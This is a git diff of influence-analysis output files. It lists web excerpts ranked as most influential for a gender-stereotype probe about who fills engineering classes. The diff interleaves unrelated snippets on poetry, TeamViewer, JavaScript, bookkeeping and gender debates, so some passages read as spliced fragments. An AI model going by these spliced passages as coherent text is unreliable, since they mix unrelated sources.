Challenge<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 98; Score = 2654208.0 -<|begin_of_text|>While we were out group-blogging for National Poetry Month, poetry news kept a'churning. One item we read in April that we bookmarked for re-blogging come May was the announcement of the Poetry Data Project at Queen Mob's Tea House. The project is the brainchild of poet Donald Dunbar and statistician Rachel Springer, and it attempts to build a map of the always already too much poetry that grows bigger by the day. As Dunbar writers: +Keep in mind that both mobile-centric features require you to be a premium user or above in order to use them. However, if you want to give the update a shot, you can grab the latest version of TeamViewer from the Windows Store now. -Even the most devoted readers with access to the most expansive collections can’t claim to be up on what’s been published in the US in the last year alone, much less the last decade, much less the last century, much less in the various traditions, cliques, movements, and cultures around the world. Even if someone had the perspective to really get what all the thousands of truly interesting poets are doing, and had time enough to read them, how would they possibly cohere that knowledge into something that would point relatively new readers towards the poets or traditions they really want to get into right now? +Thanks to Daniel H., and everyone else, for the tips! -Dunbar goes on to describe the project: +Download TeamViewer from the Windows Store -About a year ago, I was sitting around with Rachel Springer, who’s both poet and statistician, wondering at different spectra of poetry. Not good/bad, but things like wordy/sparse, and extroverted/introverted. I’m not allowed to say what categories we settled on, but Rachel broke out her stats software and created a cubic 3D graph to chart our friends’ poetry on. As we added more poets, famous and not, little clusters began forming, and as we rotated this cube, so many similarities between so many poets became easily apparent. Then we thought, what if we could make it only show, say, books published in the 1980’s? Or show poets by gender, or race, or geography, or sexual orientation? What if we could select which presses’ books to display, or show poets associated with certain schools or movements? One of the outcomes of this project will be a web-app that will allow anyone to do just that. Using the data you give us about your favorite books, we’ll create an interactive map of poetry that can be used for thought experiments, scholarship, as a guide through the bookstore, and as a teaching aid. Beyond that, Rachel wants to mine the data for secret trends. How does poetry respond to changes in the world? What trends in one tradition of poetry are mirrored in another? When has poetry been transformed, and how is it +This post may contain affiliate links. See our disclosure policy for more details.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 99; Score = 2654208.0 -<|begin_of_text|>Nobody truly understands how the world works. It is too complex. Instead, we build models that we believe are close to how the real thing works. We then use those models to discover new things and expand our understanding of how the world works. - -Following the same line of reasoning, I want to show you a model of how JavaScript work inside. It will not be the real thing, because the real thing is too complex to learn in a short article. But it will help you create a model in your mind of how it works. It will help you understand how objects, variable scopes and functions work. So that you no longer program by blindly applying rules, but by understanding how things work inside. - -Every language is separated into at least three parts. The parser, transforms your program into something the language can understand. The runtime, is the living world in which your program executes. Finally, the interpreter, puts the two together, modifying the runtime by interpreting the output of the parser. - -A parser defines how the language looks (its syntax). The runtime defines how it behaves (how we will create object, for example). Since I want to help you create a mental model of how JavaScript behaves with scopes and such, I will be talking about the runtime. If you're interested in learning about the full picture of how a languages work, take a look at my book and my online class. If you enjoy this article, I'm sure you'll enjoy them. +Rank = 99; Score = 1433600.0 +<|begin_of_text|>For any business to grow, it is crucial to keep records accurately. These records are always useful when planning for future operations. They also are used to find out how the company has been performing, especially when it comes to profitability. Therefore, records are not among the things that you can take lightly. If you cannot keep them on your own, it would be good to find the services of a bookkeeping company. This gives you the assurance that as you focus on the other important aspects that can grow your business, your records will be properly kept, and you can access them anytime you want. When looking for such a company, you have to be careful with the choices that you make. Smart organization managers do not just hire any company that they come across. They always look at the following factors before making any choice. -The Runtime +Modern bookkeeping practices -The runtime is the environment in which the language executes. Think of it as a box with which we'll interact using a specific API. In this section, we're defining this API to build and interact with the runtime. +How will your records be stored? The best Bookkeeping Company in Melbourne, VIC has invested in modern record storage techniques. Instead of the old files, they prefer to turn your documents into soft copies that can be stored more securely. This means that they can store them in the cloud, and the chances of losing any of your records will be minimal. In addition to that, they ensure that everything is securely stored so that none of your information is accessed by third parties. Remember that some of the documents may crucial to your operations, and leaking them can be costly. -We need to build representations for everything we'll have access to inside the language. The first one being: objects! +Experience in bookkeeping -Object +Finding bookkeepers that have a lot of experience is one of the things that can guarantee better services. It is because, over the years, those that have been handling a lot of records are known to offer better services. It seems that they get better with every task that they are assigned because there are unique skills that they acquire. This is the reason they know all the challenges that organization go through when it comes to managing records. They also have perfect solutions to these problems. -Objects have properties. One missing piece of our implementation is the prototype. To keep things simple, we will not have any form of inheritance. All our objects will be able to do is get and set the values stored in their properties. +Accessibility -It will also be able to wrap a real JavaScipt value, like a string or a number. We'll use this to represent strings and numbers inside our runtime. Every object living inside our program, will be an instance of JsObject. +You should be thinking of how fast you will get any of your records whenever you need them. If you have an emergency and you have to produce a specific document, you will not have the luxury of having to wait for too long for the company to provide it. For instance, if auditors demanded some proof of transactions, you should have a reliable company that can retrieve it from their systems at once. Unfortunately, this is not what you will find from all the companies out there and therefore, you have to be careful with the bookkeepers that you hire. -function JsObject(value) { this.properties = {}; this.value = value; // A JavaScipt string or number. } runtime.JsObject = JsObject; JsObject.prototype.get = function(name) { return this.properties[name]; } JsObject.prototype \ No newline at end of file +If there is no reliable bookkeeper that you know of, you may want diff --git a/examples/openwebtext/files/query_dataset_metadata.json b/examples/openwebtext/files/scores_raw/query_dataset_metadata.json similarity index 65% rename from examples/openwebtext/files/query_dataset_metadata.json rename to examples/openwebtext/files/scores_raw/query_dataset_metadata.json index b940b25..002d99a 100644 --- a/examples/openwebtext/files/query_dataset_metadata.json +++ b/examples/openwebtext/files/scores_raw/query_dataset_metadata.json @@ -1,5 +1,5 @@ { "type": "Dataset", - "dataset_size": 5, + "dataset_size": 10, "indices": null } \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw/science.txt b/examples/openwebtext/files/scores_raw/science.txt new file mode 100644 index 0000000..17222b9 --- /dev/null +++ b/examples/openwebtext/files/scores_raw/science.txt @@ -0,0 +1,2114 @@ +Query Sequence: +Prompt:Engineering and computer science classes are mostly filled with; Completion: men. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 614400.0 +<|begin_of_text|>The intersection of mental health care and gun control are suddenly tragically, and finally, the subject on every congressman’s lips and under discussion by dozens of state governors. But the two policy issues could not be further apart in terms of legislative remedies. Though both are complex and thorny matters, their respective roadblocks to resolution are diametrically opposite. + +The constitutional right to bear arms is nearly as old as our country but America’s mental health policy dates only from post-World War II. The 2nd amendment was ratified in 1791. Harry Truman signed the “National Mental Health Act,” into law in 1946. + +Though both issues are driven by unique interests, one constituency needs enormous investments of medical and psychological diagnostic research and a commitment to providing national and local support for overmatched families and schools educating thousands of children with special needs. On the other side of the checkbook, the gun owning citizenry is led by a well-informed private industry with seemingly limitless wealth — much of it dedicated to discouraging government legislators from authorizing restrictions. + +1 of 10 Full Screen Autoplay Close Skip Ad × What some pro-gun lawmakers are saying after Newtown View Photos In the aftermath of the shooting, a number of NRA-supported legislators have come out in support of new gun laws or signaled a willingness to budge. Here’s who said what. Caption In the aftermath of the shooting, a number of NRA-supported legislators have come out in support of new gun laws or signaled a willingness to budge. Here’s who said what. In the aftermath of the Newtown, Conn., massacre, a number of traditionally pro-gun-rights legislators have come out in support of a ban on assault rifles, or otherwise signaled they may be willing to budge on new gun laws. The NRA gives lawmakers a grade on their gun stance, which can be influential in their elections. The scale ranges from an A-plus rating (the legislator consistently votes with the NRA and makes a “vigorous effort to promote and defend the Second Amendment”) to an F, (a “true enemy of gun owners’ rights”). If any gun-control measure were to be passed, it would need significant support of NRA allies who buck the group’s wishes. Scott Olson/GETTY IMAGES Buy Photo Wait 1 second to continue. + +Those populations most deeply affected, though each well-intentioned and noble, rarely overlap. Most parents of young (mostly) men suffering from psychotic episodes struggle mightily to protect and care for their ill sons while seeking ways to integrate them into the larger community +================================================================================ +Rank = 1; Score = 606208.0 +<|begin_of_text|>A few weeks ago I spoke on a panel at Middle of the Map Fest called “Home Grown Tech for Social Good.” One of the questions I was asked was “How do you prepare girls for sexism in the tech industry?” I tend to treat panels like Twitter, with short, succinct responses so other panelists have time to weigh in. My <= 140 character response to this question was “We don’t, we empower them.” + +But that’s not nearly enough information to cover this issue. + +I wanted to share the two stories above to demonstrate a common theme: In the workplace we often encounter awful people and terrible bosses. It’s a fact of life. Anna and Tiffany had very similar experiences with unpleasant coworkers and bosses setting them up to fail, so why were their reactions and faith in their skills so different? + +It’s because society has told Anna that styling hair is an acceptable profession for a woman. She’s never had to convince someone that she is, in fact, a hair stylist. She went to school with classes full of women. She’s never worried about her ability to mix colors correctly or leave a toner on for just the right amount of time due to her possession of ovaries. + +When she had enough of a hostile work environment, she simply moved on to a new place. Anna takes awful people and terrible bosses in her workplace in stride, because society hasn’t told her she deserves to be treated poorly in her particular workplace because of her gender. + +Society has not been so encouraging for Tiffany. She was told that computers and electronics were for boys, she attended school as an obvious and glaring minority, she had to convince people every step of the way that she is, in fact, a programmer. When her boss criticized her, yet provided no advice for improvement, she wondered if she had what it takes to be a programmer. Society has told her as a woman she lacks the ability to think logically and critically, key factors in writing code. + +Tiffany’s story is not unique. I can’t count the number of times I’ve had to convince a professional, a new acquaintance, a loan officer or another programmer that I am, in fact, a programmer. I can’t remember all the times I’ve walked into a technology meet-up or group and had the room fall silent at the arrival of a woman. I do remember feeling the pain and rejection of peers for my excitement of computers and technology, because society didn’t support girls liking those things. + +So why don’t we “prepare girls for sexism?” When a doctor +================================================================================ +Rank = 2; Score = 598016.0 +<|begin_of_text|>Ever since my university days I have observed that be it college, open source communities or the workplace, the ratio of men to women is significantly skewed. There are a couple of factors that contribute to this. Apart from lack of awareness about the opportunities available and how to make best use of them, cultural fabrics and mindsets also play an important role. All these and much more were the centre of discussion at the Grace Hopper Celebration of Women in computing conference held in Phoenix, Arizyyona from 4th to 10 October this year. As a speaker and an attendee, I consider myself fortunate to be able to see perspectives from a much closer level and do my bit to improve the situation. + +The Conference started off on the sunny morning of the 8th October 2014. It saw a variety of talks ranging from technical topics like Molecular Biophysics, Data Science, DevOps, Networks to more generic skill-building ones like Parenting in the tech world, Interview Strategies, how to make your resume stand out and many that delved into the everyday lives of a developer, quality analyst, business analyst etc. + +As a mentor in the student opportunity lab, I met many enthusiastic young women. Being a follower of the Free Software Movement and the Open Source world, I wanted to share my learning with the larger community out there. The format of my talk was different from the usual style presentation, with an intimate audience of ten people at a time. We did multiple such sessions, each spanning about 20 minutes or so. + +Initial butterflies were soon taken over by healthy discussions at my table as i told attendees about the concept of FOSS, its importance, community structure and how it was relevant for them to know about it and contribute as a student. Having so many energetic women around with a zeal to make a change and listening to their stories definitely filled me up with a lot of positive energy! + +Among the multiple sessions that happened on that day, I got a plethora of questions.. Ranging from “what exactly is open source?”, “Oh! I thought its something on github!” to “Do we need to pay for getting an open source licence?”. Answering these and clearing many similar mind blocks regarding the specifics of open source world was a very rewarding experience. + +The rest of the conference was mostly spent at the ThoughtWorks booth. We talked to a huge number of people, telling them about ThoughtWorks, what we do and what are our practices. Our “I am the next grace hopper” frame was the centre of attraction +================================================================================ +Rank = 3; Score = 569344.0 +<|begin_of_text|>It’s been relatively quiet around here lately so how about a rousing debate on race in America? + +Iraqi war veteran Colby Bohannon has founded a group called the Former Majority Association For Equality and plans to offer five scholarships for qualified male students – the only catch, they have to be at least one quarter Caucasian. When interviewed by the American Statesmen Bohannon, who says his group doesn’t take a stand for or against Affirmative Action, said he’s just not sure that white men are the majority anymore. + +Okay, NO ONE should be denied an opportunity for an education, regardless of race, religion or color. But opportunities are not equal and fair is a concept that really works best when forecasting the weather. I wonder if Bohannon has any idea of the numbers of very smart students of color who couldn’t afford to go to college or were denied admission for various reasons. Reading this story brought me right back to the discussions I had at points in my career in various newsrooms where someone told me I was ‘lucky” I was black because my resume tape would stand out. Forget the fact that I was typically one of only two people of color working in the newsroom. + +I’m not exactly certain this plan of his wasn’t hatched on a bar napkin somewhere over a pitcher of margaritas because it doesn’t seem to be real well thought-out. + +Bohannon says he’s not sure white men are the majority anymore, which, for the life of me, I can’t figure out why that’s such an earth-shattering concept. I guess because I’m not a white man. Bohannon would do himself well by snagging one of those scholarships and take a class on how to use the Internet because a quick Google search will tell you according to the latest figures, white people (not Hispanic) make up over 65 percent of the population. If we assume half of them are men, that’s still more than double the nearest group, African Americans (nearly 13 percent). I’m not even going to go into the history of race in this country and how people of color have long been discriminated against. Something tells me it would be lost on him. + +Se let’s start today’s GEM Debate… + +Should there be a scholarship for white men only? If so why? If not, why not? + +BE RESPECTFUL please.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 4; Score = 548864.0 +<|begin_of_text|>Why are more and more straight men locking lips in public – and does it mean the end of homophobia? + +When two students asked Eric Anderson, a sociology lecturer at Bath University's department of education, if he had heard of the game "gay chicken", he shook his head. "I had no clue what it was," he says. "So they showed me." The students – both men – went in to kiss each other. + +"The challenge was that whoever pulled out first was the loser," Anderson explains. "But because men are no longer afraid of this, they ended up kissing." Anderson was inspired to carry out a new research project. + +Growing up in the US, Anderson did his PhD on "the intersection of sport, masculinities and declining homophobia" after coming out at 25. + +His research subjects caught the interest of students at Bath, hence the question about "gay chicken". Anderson discovered that the game had almost died out in the UK in the last few years "because nobody ever loses", and began to consider heterosexual university students' views of kissing other men. "I started going through my students' Facebook profiles, with their permission, and was inundated with hundreds of photos of men kissing on their nights out," Anderson reports. + +He was intrigued, and decided to investigate further via formal research. He interviewed 145 students, a mixture of men studying sports-related subjects and every third man who left the library on a particular day, from two different universities, plus other male students from a sixth-form college. The results of his survey showed 89% of the polled men saying they were happy to kiss another man on the lips through friendship. And almost 40% added that they had engaged in "sustained kissing, initially for shock value, but now just for 'a laugh'." + +"I started telling people about it, but found that a lot of academics literally did not believe me," Anderson explains. "One professor excused it as'something in the water at Bath' – even though the research covered three different educational establishments. Others flatly told me that they did not believe me. From their 'adult' perspective, this action was unfathomable. They have been stamped with attitudes of acceptable behaviour as a part of their entry into adulthood, and kissing was not permitted between men when they were young. So although they had not been in students' clubs or pubs in 20 or more years, they assumed that nothing had changed. This is known as human plasticity theory; people are stamped with a belief system +================================================================================ +Rank = 5; Score = 540672.0 +<|begin_of_text|>An extraordinary thing happened in the Houses of Parliament on Tuesday. A member of the seven-strong Backbench Business Committee burst out laughing at the suggestion that MPs should be allowed to debate a range of gender issues including domestic violence, suicide and premature mortality rates. + +In an age when offending the sensibilities of anti-sexism campaigners can cause Nobel laureates to be sacked and drive astrophysicists with unfortunate dress sense to tears of redemption, it’s a miracle there hasn’t been another hysterical lynching in the court of public opinion. + +At least it would be if it were a male politician caught on camera chortling at the suggestion that parliament should discuss issues like violence against women, breast cancer screening and eating disorders. + +The reason the media hasn’t grabbed hold of SniggerGate yet, is that the sniggering MP is female and the gendered problems she appears to find funny are issues that disproportionately affect men and boys. + +(You can watch the debate in full on Parliamentlive.tv's archive. Fast forward to 14:54:10.) + +On the day that Jess Phillips MP sniggered at the suggestion that men’s issues should be discussed in Parliament on International Men’s Day, another 13 men died from suicide. + +It’s not funny. Not for the men whose lives were lost and not for their friends and family. Suicide is a men’s issue and if we don’t talk about the problem, we can’t solve it. + +On the day the Labour member for Birmingham Yardley clapped her hands over her mouth to stop herself guffawing at Philip Davies MP’s request for a debate on men’s issues, more than 200 men died of cancer. + +As a nation we spend more time, money and energy trying to prevent, detect and cure female cancers in the UK – and yet men are 58pc more likely to die of cancer before the age of 65 than women. + +I don’t think that’s hilarious. Not for the men who die before their time and not for the loved ones they leave behind. Men of all classes have a lower life expectancy than women of the same background. It’s a men’s issue and like all men’s issues, we can’t solve it if we don’t discuss it. + +"We’re collectively more tolerant of the harm that happens to men and boys" Glen Poole + +On the day that the former manager of a charity supporting victims of domestic violence snorted at the idea that men’s issues are worthy of debate, more than 2,000 men and boys were victims of +================================================================================ +Rank = 6; Score = 540672.0 +<|begin_of_text|>Valerie (Vimalasara) Mason–John, president of the Buddhist Recovery Network, promotes recovery alternatives grounded in dharma and diversity. + +Rod Meade Sperry: You are the president of the Buddhist Recovery Network. What is the BRN’s role? + +Valerie Mason-John: The BRN was started so people involved in different Buddhist-inspired recovery programs could pool ideas and work together. I think its role is to popularize Buddhist recovery so people see it as a mainstream complement— or alternative —to programs like 12-step recovery. I’m in touch with some recovery houses and they say the Buddhist-inspired approach is great. They want to know about alternatives, because not everybody wants to do 12 steps. + +One of the things the Buddhist Recovery Network emphasizes is the need for more diversity in the recovery movement. + +I’ve been in recovery for a long while. Many years ago, when I went along to help at meetings, I was freaked out because it was just practically all men and practically all white. It didn’t reflect me at all. I was at a recovery conference and there was only one other person there of African descent! Yet we know that the war on drugs in the United States has often been a war on Black people, a war on Hispanic people. + +Even in the Buddhist recovery community, it has been dominantly male and there’s a real gap as far as women and people of color are concerned. We teach Buddhism through the lens of the Western gaze, unless you came from an Asian–American community. Buddhism was brought to the West by the Sharon Salzbergs, the Jack Kornfields, people like that. They brought it here, which was brilliant, but it’s seen through that Western gaze. But it’s not so accessible to certain people or communities. + +Do you have to be Buddhist to do Buddhist recovery? + +No. We’re using the teachings to help people with recovery. We do use Buddhist principles like the five precepts, which are recited at the meeting. But Buddhist recovery can be helpful to someone who’s a Christian, who’s a Hindu, who’s a Muslim. + +What makes the Buddhist-based approach to recovery different from the 12-step program or other forms of recovery? + +Twelve steps comes out of the Christian community and Buddhist recovery is based on the Buddhist teachings, which are all about coming out of suffering. In a way, it’s interesting we call it Buddhist recovery, because we could say that the whole path of dharma is about recovery, whether you’re an addict +================================================================================ +Rank = 7; Score = 532480.0 +<|begin_of_text|>Unless a Canadian court decides otherwise, the ski jumper with the longest flight on record at Vancouver's Olympic facility will not attend the winter Games in February. + +She is not allowed to compete. + +Olympic ski jumping is a men's-only domain. Since the first winter Games in 1924, men have been swooping down snowy ramps at 55 m.p.h. and springing into flight – human rockets hurtling chin-first, hands thrown behind, and skis angled forward. With nothing but speed and their skis to aid them, they fly the length of a football field or farther – a feat of technical genius disguised in balletic grace. + +But women can do it, too – the best often flying as far as men. + +With women now included in such formerly all-male Olympic events as boxing, wrestling, bobsleigh, and luge, the last Olympic door closed to women is ski jumping. + +But American ski jumper Lindsey Van – who set the record on the 90-meter jump when the Olympic venue opened in Vancouver, British Columbia, last year and is the reigning world champion – hasn't given up on prying that door open. It's a logical step for the 24-year-old, who, since age 7, has been soaring over Earth's mundane limits on what is possible. + +She and more than a dozen other women jumpers from Slovenia to Norway hope to legally force the addition of women's jumping before the Games open Feb. 12. Their lawsuit against the Vancouver Organizing Committee (VANOC) contends that not allowing women to jump for gold is a form of discrimination under Canadian laws that prohibit gender discrimination in government activities. + +A Canadian judge, last summer, agreed: It is discrimination. + +But her ruling concluded that while VANOC is subject to those antidiscrimination laws, it can't control the events – that's the domain of the International Olympic Committee (IOC). The IOC voted in 2006 against including women's ski jumping in 2010 because it deemed there weren't enough high-level women to create competition worthy of the Olympics. Because the IOC isn't bound by Canadian law, the judge ruled, Canada is powerless to change the program. + +So the jumpers' appeal asks Canada to refuse to hold the men's event unless both genders can compete. + +When the appeal is heard Nov. 12 and 13, it will highlight not just women's battle to wipe out the last vestige of an old-boys-club Olympic culture, but also competing demands on the Olympic ideal: + +•Allow +================================================================================ +Rank = 8; Score = 505856.0 +<|begin_of_text|>Next month, yet another version of Charlotte Bronte’s novel Jane Eyre will be adapted for the screen, this time as a major motion picture by director Cary Fukunaga. While there have already been many film and TV versions of the book, Fukunaga’s take promises a sharp departure from the mild, romantic presentations of the past, taking on a much darker and menacing tone. (Watch the trailer.) + +This new look at Jane Eyre has got me wondering about the appeal the novel has today. The classic is often construed as a girls’ novel, the mother of the romance genre. As I remember it, girls usually choose it in school, while boys preferred something more brash, like Hemingway’s A Farewell to Arms. It’s often organized as “women’s fiction” (a bizarre and seemingly arbitrary term that apparently includes both Harper Lee’s To Kill a Mockingbird, and Snooki’s A Shore Thing). + +I’ll admit, I’ve avoided Jane Eyre, as well as Pride and Prejudice and other similarly categorized novels, based purely on the way they’ve been marketed to the genders. Because I’m a guy, it never seemed like these books were for me to read. But I now find myself anticipating the new Jane Eyre film, which will star Mia Wasikowska and Dame Judi Dench. It actually makes the book look, well, cool. + +Don’t like ads? Become a supporter and enjoy The Good Men Project ad free + +If Fukunaga’s adaptation of Jane Eyre brings out the strength in Jane’s character, it also seems like it will appeal to more men. It appears to tell the tale in a more traditionally masculine way: the trailer conveys a sense of imminent danger, spiritual conflict, and brooding mystery. Perhaps it will inspire more men to pick up the zombie-free version of the novel. I’ll be among them. + +In the wake of Jane Slayer, which re-imagines Jane as a zombie-slaying heroine (part of a trend that also includes Pride and Prejudice and Zombies), people are beginning to recognize Bronte’s gothic influences. The story of Jane Eyre, it turns out, is a complicated and nuanced tale not merely of love gone bad. At its core is a story about character, morality, and independence. + +The movie also appears to emphasize Jane as a heroine—an essential part of the story, and a designation Jane doesn’t often receive. There has been some recent debate over this: last week, +================================================================================ +Rank = 9; Score = 495616.0 +<|begin_of_text|>Choice of Majors: Are Women Really Different from Men? + +NBER Working Paper No. 23735 + +Issued in August 2017 + +NBER Program(s):Economics of Education, Labor Studies + +Recent work 